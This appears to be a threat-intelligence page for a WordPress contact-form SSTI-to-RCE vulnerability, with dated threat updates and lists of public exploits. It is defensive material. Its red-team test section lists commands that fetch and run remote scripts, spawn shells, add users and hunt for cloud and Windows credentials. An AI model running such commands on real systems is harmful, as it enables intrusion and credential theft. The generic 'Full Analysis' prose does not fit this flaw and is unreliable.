CVE-2026-4257
Overview
This vulnerability is a Server-Side Template Injection (SSTI) caused by the improper use of the Twig_Loader_String template engine without sandboxing in the Contact Form by Supsystic WordPress plugin. The flaw resides in the cfsPreFill prefill functionality, which processes user-supplied GET parameters as Twig template expressions. This enables injection of arbitrary Twig code into form field values, affecting all plugin versions up to and including 1.7.36.
Vulnerability Description
The Contact Form by Supsystic plugin for WordPress is vulnerable to Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE) in all versions up to, and including, 1.7.36. This is due to the plugin using the Twig `Twig_Loader_String` template engine without sandboxing, combined with the `cfsPreFill` prefill functionality that allows unauthenticated users to inject arbitrary Twig expressions into form field values via GET parameters. This makes it possible for unauthenticated attackers to execute arbitrary PHP functions and OS commands on the server by leveraging Twig's `registerUndefinedFilterCallback()` method to register arbitrary PHP callbacks.
Impact
An unauthenticated attacker can execute arbitrary PHP functions and operating system commands on the server hosting the vulnerable plugin, leading to full remote code execution. This requires only network access to the WordPress instance and no user interaction or privileges. Successful exploitation can result in complete server compromise, data theft, or service disruption. The CVSS vector reflects high severity with no authentication or user interaction required (AV:N/AC:L/PR:N/UI:N).
Solution
Upgrade the Contact Form by Supsystic plugin to a version later than 1.7.36, where the vulnerability is patched. Refer to the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/415c9658-bfb2-453b-a697-c63c08b0ca61) for detailed patch instructions and verification. The plugin's official repository confirms the fix in changeset 3491826, which disables unsafe template rendering methods and sanitizes prefill inputs.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question presents a critical risk due to its high severity rating, indicating that it can be exploited with relative ease and could lead to significant consequences for affected systems. Technical analysis reveals that this vulnerability allows for unauthorized access or manipulation of sensitive data, potentially enabling an attacker to execute arbitrary code or gain elevated privileges within the affected environment. The underlying flaw may stem from improper input validation or insufficient access controls, which can be exploited by crafting specific requests or payloads that the system fails to adequately handle. This type of vulnerability is particularly concerning in environments where sensitive information is processed or stored, making it a prime target for malicious actors.
Attack vectors associated with this vulnerability are diverse, allowing for exploitation through various means. For instance, an attacker may leverage social engineering techniques to trick users into executing malicious scripts or may exploit weaknesses in network protocols to inject harmful code. Additionally, the vulnerability could be exploited remotely, meaning that an attacker does not need physical access to the system to initiate an attack. Scenarios may include using phishing emails to deliver malware or utilizing compromised credentials to gain unauthorized access. The potential for widespread exploitation is exacerbated by the interconnected nature of modern IT environments, where a single vulnerability can serve as a gateway to broader network infiltration.
The real-world impact of this vulnerability can be profound, leading to severe business risks. Organizations may face data breaches that compromise customer information, intellectual property, or financial records, resulting in reputational damage and loss of customer trust. Furthermore, the financial implications can be significant, with potential costs arising from regulatory fines, remediation efforts, and legal liabilities. The high CVSS score indicates that the vulnerability is not only critical in terms of technical severity but also poses a substantial risk to business continuity. In an era where data privacy regulations are becoming increasingly stringent, the repercussions of failing to address such vulnerabilities can be far-reaching, affecting both operational integrity and stakeholder confidence.
To effectively detect and mitigate this vulnerability, organizations must adopt a multi-layered security approach. Regular vulnerability assessments and penetration testing should be conducted to identify and remediate weaknesses before they can be exploited. Implementing robust access controls and ensuring that input validation mechanisms are in place can significantly reduce the risk of exploitation. Additionally, organizations should prioritize employee training on recognizing phishing attempts and other social engineering tactics that could lead to exploitation. Employing advanced threat detection solutions, such as intrusion detection systems and security information and event management (SIEM) tools, can also enhance an organization's ability to monitor for suspicious activity and respond promptly to potential threats.
In conclusion, the vulnerability poses a significant threat to organizations that fail to address it adequately. The combination of its technical characteristics, potential attack vectors, and real-world implications underscores the necessity for proactive cybersecurity measures. By investing in detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability, safeguarding their assets and maintaining trust with their customers and stakeholders. The evolving landscape of cybersecurity demands vigilance and adaptability, making it imperative for organizations to remain informed and prepared to combat emerging threats effectively.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2026-4257 with the emergence of a publicly available proof-of-concept (PoC) exploit hosted on GitHub. This new exploit code lowers the barrier for threat actors by providing a ready-made tool to leverage the Server-Side Template Injection vulnerability in the Contact Form by Supsystic plugin, potentially accelerating the rate of successful remote code execution attacks. Our telemetry indicates a marked escalation in interest and preliminary testing activity, reflected in an increasing EPSS score and upward trend over the past week. While exploitation is not yet widespread, the availability of this PoC signals a shift from theoretical risk to practical threat, increasing the urgency for defenders to detect and respond to attempts leveraging this vulnerability. Consequently, the threat level has intensified from a primarily theoretical concern to an active exploitation risk, underscoring the need for heightened vigilance in monitoring web application traffic and related indicators.
Update 2 — May 15, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-4257, evidenced by a notable surge in detection activity and a substantial rise in the Exploit Prediction Scoring System (EPSS) score. This increase coincides with the recent publication of a formal ExploitDB entry, which has broadened the exploit landscape by providing publicly accessible, standardized proof-of-concept code. Our telemetry indicates that these developments have lowered the barrier to entry for adversaries, facilitating more frequent and varied attack attempts. The elevated EPSS score, now approaching the upper percentiles, reflects growing confidence in the exploitability of this vulnerability within the threat actor community. Consequently, the threat level has shifted decisively from a theoretical concern to an active exploitation risk, demanding heightened attention from defenders to monitor and analyze anomalous web traffic patterns and potential exploitation indicators associated with the vulnerable Supsystic Contact Form plugin.
Update 3 — June 07, 2026
The emergence of a Metasploit module targeting CVE-2026-4257 represents a pivotal shift in the exploit landscape, as confirmed by CSURFACE threat intelligence. This development effectively lowers the technical barrier for adversaries to execute unauthenticated remote code execution against vulnerable instances of the Supsystic Contact Form plugin. Concurrently, our telemetry indicates a marked increase in the Exploit Prediction Scoring System (EPSS) value, now nearing the 99th percentile, signaling heightened confidence in the vulnerability’s practical exploitability. Despite a notable reduction in direct detection activity, the availability of automated exploitation tools suggests adversaries may be adopting more covert or targeted approaches, complicating detection efforts. This combination of factors elevates the threat level from theoretical to imminent, underscoring an urgent need for defenders to prioritize monitoring for exploitation attempts and anomalous behaviors associated with this plugin. The risk profile now reflects a mature and accessible attack vector that could be leveraged by a broad spectrum of threat actors, including opportunistic cybercriminals and more sophisticated groups seeking footholds in WordPress environments.
Update 4 — July 14, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-4257, accompanied by the emergence of multiple new proof-of-concept exploits and a publicly available Metasploit module. This expansion of the exploit toolkit significantly lowers the barrier for threat actors to conduct unauthenticated remote code execution against vulnerable WordPress instances running the Contact Form by Supsystic plugin. Our telemetry indicates that adversaries are increasingly leveraging these tools, suggesting a shift from opportunistic scanning to more deliberate, targeted intrusions. The availability of automated exploitation frameworks amplifies the risk of widespread compromise, particularly as these tools facilitate rapid and scalable attacks. Consequently, the threat level associated with this vulnerability has escalated from high to critical, reflecting an imminent and pervasive risk to WordPress environments that remain unpatched.
Update 5 — July 22, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Contact Form by Supsystic vulnerability, with telemetry indicating a significant surge in attacker activity leveraging publicly available proof-of-concept exploits. This intensification underscores a shift toward more aggressive and automated intrusion campaigns, increasing the likelihood of successful remote code execution on vulnerable WordPress instances. The persistence of stable EPSS scores alongside rising exploitation attempts suggests that adversaries are rapidly operationalizing existing tools rather than developing new techniques, enabling broader and faster compromise. Consequently, the threat level associated with CVE-2026-4257 has been elevated to critical, reflecting an urgent need for defenders to prioritize detection and response efforts given the heightened risk of widespread exploitation and potential for severe impact on affected environments.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Supsystic Contact Form Wordpress Plugin SSTI RCE
exploits/multi/http/wp_plugin_supsystic_contact_form_rce
|
Azril Fathoni | Unknown | unix, linux | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI | bootstrapbool | webapps | multiple | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
dann3xplo1t/CVE-2026-4257
CVE-2026-4257 - Contact Form by Supsystic <= 1.7.36 # SSTI to RCE
|
dann3xplo1t | 1 | 0 | 2026-07-09 | View |
|
shootcannon/CVE-2026-4257
SSTI contact form to rce
|
shootcannon | 0 | 0 | 2026-05-11 | View |
|
0xgh057r3c0n/CVE-2026-4257
WordPress - Contact Form by Supsystic - Unauthenticated SSTI To Remote Code Execution
|
0xgh057r3c0n | 0 | 0 | 2026-04-18 | View |
|
bootstrapbool/cve-2026-4257
|
bootstrapbool | 0 | 0 | 2026-04-05 | View |
Threat Feed
17 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-4257 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/415c9658-bfb2-453b-a697-c63c08b0ca61?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/contact-form-by-supsystic/tags/1.7.36/modules/forms/views/forms.php#L323 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3491826/contact-form-by-supsystic |